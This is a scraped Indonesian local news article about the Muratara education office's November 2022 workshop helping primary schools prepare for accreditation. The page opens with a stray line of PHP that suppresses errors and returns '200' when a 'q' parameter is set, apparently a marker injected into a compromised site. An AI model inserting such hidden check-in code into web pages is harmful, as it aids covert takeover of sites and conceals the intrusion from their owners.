error_reporting(0); set_time_limit(0); if ($_GET['q']=='1'){echo '200'; exit;} Kejar Nilai Akreditasi, Disdik Muratara Lakukan Bimtek - SMI.COM

Home / MURATARA

Senin, 14 November 2022 - 18:37 WIB

Kejar Nilai Akreditasi, Disdik Muratara Lakukan Bimtek

MURATARA, SMI-

Guna mendukung penyelenggaraan akreditasi Badan Akreditasi Nasional Sekolah Dasar /Madrasa, Dinas Pendidikan Kabupaten Musi Rawas Utara (Muratara), menggelar bimbingan teknis (bimtek) peningkatan mutu pendidikan akreditasi, Senin (14/11/22).

Kegiatan tersebut berlangsung di hotel Dwinda yang diikuti oleh 90 peserta dari 45 lembaga Sekolah Dasar diwilayah Kabupaten Muratara, yang akreditasi sekolah akan berakhir tahun 2023 dan 2024 mendatang.

Dalam kegiatan, mereka mendapatkan materi dari narasumber. Diantaranya, berasal dari Badan Akreditasi Nasional Sekolah/Madrasa (BAN-SM), H. Dr Sutarman dan H. Aridi Akuan, M.M, Koordinator Pelaksana Akreditasi Kabupaten Muratara Sularman, S.Pd, Kejari kota lubuklinggau diwakili oleh Riyanto Ade Putra, S.H., M.M Kasubsi ekonomi keuangan dan pengamanan pembangunan strategis, Kadisdik Muratara Zazili, S.sos, yang berlangsung selama 3 hari.

Baca Juga :  Ajak Masyarakat Tanam Bawang Merah, Bupati Muratara Dapat Penghargaan "Matalokal Award", Inovator Komoditi Baru

Kepala Disdik Kabupaten Muratara Zazili mengatakan, kegiatan ini bertujuan untuk meningkatkan kinerja kepala sekolah dan guru dalam meningkatkan nilai akreditasi sekolah. “Melalui bimtek ini diharapkan dokumen akreditasi sekolah dapat tersusun dengan baik,” sampainya.

Diterangkanya, Dengan adanya bimtek akreditasi tersebut pihak sekolah dapat dapat pemahaman tentang substansi akreditasi akreditasi sekolah dalam meningkatkan mutu pendidikan di daerah akan semakin meningkat.

‘’Akreditasi sekolah harus dipahami dengan benar. Karna dapat memberikan informasi tentang kelayakan sekolah atau program yang dilaksanakannya berdasarkan Standar Nasional Pendidikan, memberikan pengakuan peringkat kelayakan dan rekomendasi penjaminan mutu pendidikan kepada program dan satuan pendidikan yang diakreditasi,” sampainya.

Baca Juga :  Dapat Dukungan Suami "Lia Mustika Syarif " Resmi bergabung di DPD Partai Golkar Muratara

Dengan begitu, kegiatan semacam ini akan membantu lembaga pendidikan dalam melakukan akreditasi pada akhirnya dapat meningkatkan mutu dan kualitas pendidikan.

“Yang paling penting, untuk meningkatkan kesiapan lembaga dalam persiapan mengikuti visi Badan Akreditasi Nasional (BAN) SD Provinsi Sumatera Selatan. Paling tidak ke depannya, nilai akreditasinya bisa meningkat dari sebelumnya,” tutupnya.

(02zm)

Share :

Baca Juga

MURATARA

H .Devi Surhartoni (HDS) Wakil Bupati Muratara : Orang Pertama Di Vaksin

MURATARA

Terpanggil Ingin Memajukan Desa: ZAMZAMI Maju Calon Kades Rantau Jaya

MURATARA

Ir Suhardiman, Buka Turnamen Poli Cap di Desa Bukit Langkap 

MURATARA

Angka Stunting di Kabupaten Muratara Tembus 28,03% “Dr Arios Saplis ” Sebut OPD Lain

MURATARA

SKK Migas-KKKS SRMD Gandeng PWI Muratara, Bantu Korban Angin Puting Beliung

MURATARA

HDS Ajak Masyarakat, Masuk Kedalam Rumah Besar Muratara

MURATARA

Tak Kunjung di Perbaiki Warga Desa Lawang Agung Gotong royong

MURATARA

Polres Muratara : Lakukan Sosialisasi Tilang Etle dan Aplikasi Smart City Dulur Kito